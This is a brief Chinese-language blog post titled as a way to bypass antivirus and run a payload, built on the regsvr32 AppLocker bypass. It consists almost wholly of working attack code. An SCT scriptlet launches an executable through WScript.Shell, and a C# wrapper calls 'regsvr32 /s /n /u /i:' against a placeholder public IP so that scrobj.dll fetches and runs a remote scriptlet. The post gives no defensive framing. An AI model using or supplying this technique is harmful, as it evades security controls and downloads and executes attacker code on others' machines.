绕过杀软执行payload

作者: admin 分类: 未分类 发布时间: 2017-08-02 11:11
https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
//exploit/windows/misc/regsvr32_applocker_bypass_server


<?XML version="1.0"?>
<scriptlet>
<registration         
progid="Pentest"       
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
 
<![CDATA[   
var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe"); 
]]>
 
</script>
</registration>
</scriptlet>

==============================================
using System;
using System.Runtime.InteropServices;

namespace Regsvr

{ public class CMD
	{ [DllImport("msvcrt.dll")]
		public static extern int system(string cmd);
		public static void Main()
		{ system("regsvr32 /s /n /u /i:http://public_ip:port/file.sct scrobj.dll");
		}}}
标签云